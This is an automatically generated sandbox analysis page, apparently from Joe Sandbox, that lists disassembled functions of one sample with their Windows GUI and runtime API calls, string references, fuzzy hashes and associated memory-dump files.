Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hu$csm
API String ID: 1170836740-2527861355
Opcode ID: b65977079d0f83bd75f3418b7100e6f685a817615b6723341c1b6f69698997e7
Instruction ID: 1dd3efced6346a83e68eb1c28f47bfc60c01d62c5a06988f51a068dce9c11d7c
Opcode Fuzzy Hash: b65977079d0f83bd75f3418b7100e6f685a817615b6723341c1b6f69698997e7
Instruction Fuzzy Hash: 0741A734A00209EBCF14DF68C849ADEBBB5BF46365F148155EC146B353D7B9AA0ACBD0

Function 0079C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0079C913

Strings

blank, xrefs: 0079C895
warning, xrefs: 0079C8FC
stop, xrefs: 0079C8E4
question, xrefs: 0079C8CC
info, xrefs: 0079C8B4

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 28500d4837ede26f3a32039a66dbd9c0e38d913a6304b551424b6a1cf2e268a6
Instruction ID: 25c1ccf66b0f9130514d0e0b13bb32bf53f592851ce6ff3bc33af35a025ca995
Opcode Fuzzy Hash: 28500d4837ede26f3a32039a66dbd9c0e38d913a6304b551424b6a1cf2e268a6
Instruction Fuzzy Hash: 2811EE31689306BEEF06A754AC83CEA779CDF15369B10402AF504A6282D7AD6D405374

Function 0074F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0078682C,00000004,00000000,00000000), ref: 0074F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0078682C,00000004,00000000,00000000), ref: 0078F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0078682C,00000004,00000000,00000000), ref: 0078F454

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d1819faa231796ed9baf0ff6b8a177040f0db03a1e582464ffd705aab008d8cf
Instruction ID: df2711207a9b5cec927e700e307dbbf768f3d5d6964f6d9e91c7197522e96f60
Opcode Fuzzy Hash: d1819faa231796ed9baf0ff6b8a177040f0db03a1e582464ffd705aab008d8cf
Instruction Fuzzy Hash: C9411B31608680FED739AF29C98CB2A7B91AF56314F14843DE08BD6960C73DB880CB11

Function 007C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007C2D1B
GetDC.USER32(00000000), ref: 007C2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C2D2E
ReleaseDC.USER32(00000000,00000000), ref: 007C2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007C2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,?,007746DB,?,?,?,?), ref: 007C2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C2DE1

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 47bbea585faec92699c6d6d714f59c2c59b30676976565c04da86d3470998a5f
Instruction ID: 3807f973be2f5f1eb3991162baf065dbed4e61d6d39d4278f0200cca497cd67a
Opcode Fuzzy Hash: 47bbea585faec92699c6d6d714f59c2c59b30676976565c04da86d3470998a5f
Instruction Fuzzy Hash: BE31A072201214BFEB154F50CC89FEB3FADEF19711F048059FE09AA291C6799C41CBA4

Function 007B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007B4648
VariantInit.OLEAUT32(?), ref: 007B4749
VariantClear.OLEAUT32(?), ref: 007B4753
VariantClear.OLEAUT32(?), ref: 007B47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007B472C
Null Object assignment in FOR..IN loop, xrefs: 007B45D8, 007B4706, 007B47BE

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 1b5ed5fb2baa895322b9e460071d854620c3bf3cfa20f37bc4714cf0264489f1
Instruction ID: f38beb9d1a57282d5f01478fed9d71ea4846bbbbeaa19486e1790323e405d9f0
Opcode Fuzzy Hash: 1b5ed5fb2baa895322b9e460071d854620c3bf3cfa20f37bc4714cf0264489f1
Instruction Fuzzy Hash: 01918171A00219ABDF24CFA4C848FEE7BB8EF46714F108559F505AB282DB789945CBA0

Function 0074948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f0179b6997baf7a56b2edc0249b916cd55cf735e7a30194b0bb2a883326fef9d
Instruction ID: a8998283ef45b0736c57e8254fb8f5f9dfaf6bb214b331e66ae05fa36e220c93
Opcode Fuzzy Hash: f0179b6997baf7a56b2edc0249b916cd55cf735e7a30194b0bb2a883326fef9d
Instruction Fuzzy Hash: F8914A71D40219EFCB15CFA9CC88AEEBBB8FF49320F248159E515B7291D378A951CB60

Function 007C7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(016F34E0), ref: 007C7F37
IsWindowEnabled.USER32(016F34E0), ref: 007C7F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007C801E
SendMessageW.USER32(016F34E0,000000B0,?,?), ref: 007C8051
IsDlgButtonChecked.USER32(?,?), ref: 007C8089
GetWindowLongW.USER32(016F34E0,000000EC), ref: 007C80AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007C80C3

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 297669032de6edcff52e6ee67cc94fabdc5282305b8e57407baf9df61e100d38
Instruction ID: e1513c10f3576942c2c016a88b6a950c935a72ffc43c005cf6a621a33dfd98b8
Opcode Fuzzy Hash: 297669032de6edcff52e6ee67cc94fabdc5282305b8e57407baf9df61e100d38
Instruction Fuzzy Hash: 8A719D74608204AFEF299F64C8D4FAABBB9FF09340F14405DE945972A1CB39AD46DF11

Function 0079DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 0079DA74
LoadStringW.USER32(00000000), ref: 0079DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0079DA91
LoadStringW.USER32(00000000), ref: 0079DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0079DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0079DAB9

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e7028d9393dfac8bb6642eb2bf78f016dc0fa97e826cd39d76ceaaf6139e707d
Instruction ID: d796c692b56e88a92de7c5be18c2176ca152d67a470386d1241e4a2beb5f5b5f
Opcode Fuzzy Hash: e7028d9393dfac8bb6642eb2bf78f016dc0fa97e826cd39d76ceaaf6139e707d
Instruction Fuzzy Hash: 810136F65002087FFB11ABA49D89EF7776CE708701F408499F74AE2041EA789E854F74

Function 007A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007A097B
RtlEnterCriticalSection.NTDLL(?), ref: 007A098D
TerminateThread.KERNEL32(00000000,000001F6,?,?,?,?,?,?,?,?,?,?,?,?,007726DC), ref: 007A099B
WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,007726DC), ref: 007A09A9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007726DC), ref: 007A09B8
InterlockedExchange.KERNEL32(?,000001F6), ref: 007A09C8
RtlLeaveCriticalSection.NTDLL(?), ref: 007A09CF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 415275b8aa65a772569051a6e7483df64d2602e68d28703767ea0ee6d58f6b38
Instruction ID: 99011147b87751ab25d7d14fecb0604481e0fe185c28692bfc474ca50c388ab8
Opcode Fuzzy Hash: 415275b8aa65a772569051a6e7483df64d2602e68d28703767ea0ee6d58f6b38
Instruction Fuzzy Hash: 55F03C32442A02BBD7425FA4EE8DFD6BB39FF41702F406129F206908A0C778A465CF94

Function 00735D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00735D30
GetWindowRect.USER32(?,?), ref: 00735D71
ScreenToClient.USER32(?,000000FF), ref: 00735D99
GetClientRect.USER32(?,?), ref: 00735ED7
GetWindowRect.USER32(?,?), ref: 00735EF8

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 2e4ba682ce4efcb903353532f8c70119cd8af05fad839c758de9ba289f0bca37
Instruction ID: 320eaa3cfd9698e5632a15f5faaac59a244106a097708db829a3864aaa9fc272
Opcode Fuzzy Hash: 2e4ba682ce4efcb903353532f8c70119cd8af05fad839c758de9ba289f0bca37
Instruction Fuzzy Hash: 6FB16875A00B4ADBDB10CFA9C4807EEB7F1FF58310F14851AE8A9D7250DB38AA51DB54

Function 0078F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0078F7B9
SysAllocString.OLEAUT32(?), ref: 0078F860
VariantCopy.OLEAUT32(?,00000000), ref: 0078F889
VariantClear.OLEAUT32(?), ref: 0078F8AD
VariantCopy.OLEAUT32(?,00000000), ref: 0078F8B1
VariantClear.OLEAUT32(?), ref: 0078F8BB

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 9d1880cc18151f890f6511af781b0c64f3194fa1d7a1f78623169fb5687a28b9
Instruction ID: 0b20850be16222562043e1d83147a8ec9d28674a43ab69d0a78192ec38f50d5d
Opcode Fuzzy Hash: 9d1880cc18151f890f6511af781b0c64f3194fa1d7a1f78623169fb5687a28b9
Instruction Fuzzy Hash: 7C51C831641310FADF24BF66D899B29B3A4EF45310F249467E905DF292DB7C9C40CB66

Function 0074920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

BeginPaint.USER32(?,?,?), ref: 00749241
GetWindowRect.USER32(?,?), ref: 007492A5
ScreenToClient.USER32(?,?), ref: 007492C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007492D3
EndPaint.USER32(?,?,?,?,?), ref: 00749321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007871EA

Part of subcall function 00749339: BeginPath.GDI32(00000000), ref: 00749357

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 71fdb994f919e272595898334cb5303958dac0bb7bfd02a52c1c2e8d9529970e
Instruction ID: f4134e39bcb25ac7e3a316f96744e3466914699ca461f66abe22d1cdd7ad1d03
Opcode Fuzzy Hash: 71fdb994f919e272595898334cb5303958dac0bb7bfd02a52c1c2e8d9529970e
Instruction Fuzzy Hash: EF419C70504200EFDB21DF25CC88FAB7BA8FB86330F144269FA95872E1C7799845DB62

Function 007C81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0078F3AB,00000000,?,?,00000000,?,0078682C,00000004,00000000,00000000), ref: 007C824C
EnableWindow.USER32(00000000,00000000), ref: 007C8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007C82D1
ShowWindow.USER32(00000000,00000004), ref: 007C82E5
EnableWindow.USER32(00000000,00000001), ref: 007C830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007C832F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7497bc5699302017cd49ebe0ffe422e56f6eb44b71b70f7620b70341c212ef29
Instruction ID: 48f06a8e2d39a6d03df4b36857d9466b1fa4ab124b1b4fb0ec2ee26c83da8d54
Opcode Fuzzy Hash: 7497bc5699302017cd49ebe0ffe422e56f6eb44b71b70f7620b70341c212ef29
Instruction Fuzzy Hash: 7C418334601644EFDFA6CF25C89DFE87BE1FB4A714F1851ADE5084B2A2CB35A841CB52

Function 00753382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00753379,00752FE5), ref: 00753390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0075339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007533B7
SetLastError.KERNEL32(00000000,?,00753379,00752FE5), ref: 00753409

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 4132e32f726df1b30b30409a7d0bcce57487ed34e4db244bdc6efefe83ce3a64
Instruction ID: 10507c56a7a303985c9d89dfd4b2b47f56c2a16a8d9ec5efd5f6a53a004b7cf7
Opcode Fuzzy Hash: 4132e32f726df1b30b30409a7d0bcce57487ed34e4db244bdc6efefe83ce3a64
Instruction Fuzzy Hash: 8C01B132609315AEEA2627747D8A9F62B94EB053FB720422DFC10891F1EFAD4D0E954C

Function 007C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00749639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00749693
Part of subcall function 00749639: SelectObject.GDI32(?,00000000), ref: 007496A2
Part of subcall function 00749639: BeginPath.GDI32(?), ref: 007496B9
Part of subcall function 00749639: SelectObject.GDI32(?,00000000), ref: 007496E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007C8A4E
LineTo.GDI32(?,00000003,00000000), ref: 007C8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007C8A70
LineTo.GDI32(?,00000000,00000003), ref: 007C8A80
EndPath.GDI32(?), ref: 007C8A90
StrokePath.GDI32(?), ref: 007C8AA0

Memory Dump Source

